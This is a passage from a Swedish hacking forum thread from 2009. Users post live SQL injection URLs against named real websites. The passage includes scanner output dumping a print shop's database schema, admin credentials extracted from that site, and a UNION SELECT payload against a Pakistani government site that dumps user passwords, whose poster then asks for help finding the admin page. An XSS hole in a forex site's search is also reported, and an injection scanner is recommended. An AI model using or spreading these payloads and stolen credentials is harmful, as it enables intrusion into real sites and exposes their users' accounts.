2009-09-19, 18:48
  #577
Medlem
Rynes avatar
http://www.tryckakuten.se/products.a...a=database()--

http://www.tryckakuten.se/products.a...rom+tbladmin--


Kod:
[+] Gathering MySQL Server Configuration...
	Database: tryckakuten_se
	User: tryckak_se@t4773@s77.loopia.se
	Version: 5.0.45-log

[Database]: tryckakuten_se
[Table: Columns]
[0]tbladmin: ID,anv,losen,namn,epost
[1]tblads: Ads_ID,Rubrik,Innehall,Bild,Datum,Status
[2]tblbestallningsinfo: ID,Rubrik,Beskrivning
[3]tblcmsmeny: ID,Namn,Link
[4]tbldefault: ID,Rubrik,Beskrivning
[5]tblfaq: ID,Rubrik,Beskrivning
[6]tblkontakt: ID,Rubrik,Beskrivning
[7]tblofferter: Offert_ID,Offertnr,Rubrik,Innehall,Produkt,Pris,Datum,ProdKat,Status
[8]tblprodlist: prodlist_ID,Rubrik,Datum,ProdKat,Status
[9]tblproducts: Prod_ID,Rubrik,Innehall,Bild,Pris,Datum,ProdKat,Status
[10]tblslideshow: Slideshow_ID,Rubrik,Innehall,Bild,Datum,ProdKat,Status
[11]tblstartsida: ID,Rubrik,Beskrivning
[12]tbltavling: ID,Rubrik,Beskrivning
Citera
2009-09-19, 20:30
  #578
Medlem
LeetHaxxors avatar
Citat:
Ursprungligen postat av cnb
Men fy fan för att inte md5a användares lösenord!
Att använda md5 är ju NÄSTAN samma sak som att inte kryptera alls.. Dock skillnad om statiskt salt och dynamiskt salt är med i bilden, men att föredra vore ju sha512 + statiskt salt + dynamiskt salt eller liknande, men pga prestandaskäl använder inte många det.. än.
Citera
2009-09-19, 21:08
  #579
Medlem
Nordin11s avatar
leethaxxor Att du säger att det är NÄSTAN som att inte kryptera alls är skitsnack.Däremot får dom som har dåligt pw helt enkelt skylla sig själv.Har du över 10 bokstäver/siffror så blir det svårt att knäcka;P Går ju att cracka med gpu bruteforcer men segt gåre.

Kan ju själv säga att mitt pw är riktigt kort och inge siffror o specialtecken.Däremot tar jag skit passwords till random sidor.
Citera
2009-09-20, 00:48
  #580
Bannlyst
Citat:
Ursprungligen postat av Ryne
http://www.tryckakuten.se/products.a...a=database()--
varför:

group_concat(concat(column_name,0x3a,table_name))

istället för:

group_concat(column_name,0x3a,table_name)

??? misstag eller?
Citera
2009-09-20, 01:22
  #581
Medlem
Citat:
Ursprungligen postat av Smurfacc
varför:

group_concat(concat(column_name,0x3a,table_name))

istället för:

group_concat(column_name,0x3a,table_name)

??? misstag eller?

Kanske för att han använde en scanner?


Scannern heter DarkMySQLi och finns förövrigt här: http://defacement88.blogspot.com/200...kmysqlipy.html
__________________
Senast redigerad av NoSeat1 2009-09-20 kl. 01:24.
Citera
2009-09-20, 02:04
  #582
Medlem
ant's avatar
Citat:
Ursprungligen postat av NoSeat1
Kanske för att han använde en scanner?


Scannern heter DarkMySQLi och finns förövrigt här: http://defacement88.blogspot.com/200...kmysqlipy.html
Kan lika gärna vara schemafuzz som jag tipsade om tidigare här i tråden.
Citera
2009-09-20, 20:22
  #583
Medlem
Nordin11s avatar
Sry hade inte läst igenom tråden
__________________
Senast redigerad av Nordin11 2009-09-20 kl. 20:58.
Citera
2009-09-20, 20:39
  #584
Medlem
Citat:
Ursprungligen postat av Nordin11
Får fram det här från tryckakuten.se



Table : tbladmin

anv:losen:epost:

Fh7XBuWb87Nk:7731J70UHjc2:.:


Nej men gud vad duktig du är
Citera
2009-09-20, 21:13
  #585
Medlem
Lite nytt material dårå.
Citera
2009-09-20, 21:42
  #586
Medlem
cnbs avatar
Citat:
Ursprungligen postat av simplasche
Lite nytt material dårå.


Tackar!
Citera
2009-09-20, 23:22
  #587
Bannlyst
regeringen hehe

http://nwfp.gov.pk/nwfpgov/HowdoI/Se...p?eHowCatId=-7 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(id,0x3a,username,0x 3a,password),11,12,13,14 FROM user-- Men jag hittar inte admin page hjälp??
Citera
2009-09-20, 23:32
  #588
Medlem
korqs avatar
Forex.se tillåter xss i sin söktjänst: http://www.forex.se/sv/Sokresultat/?...9%3C/script%3E

Det är ju inget allvarligt, men tillåter dom detta bör det gå att hitta fler saker.
Citera

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in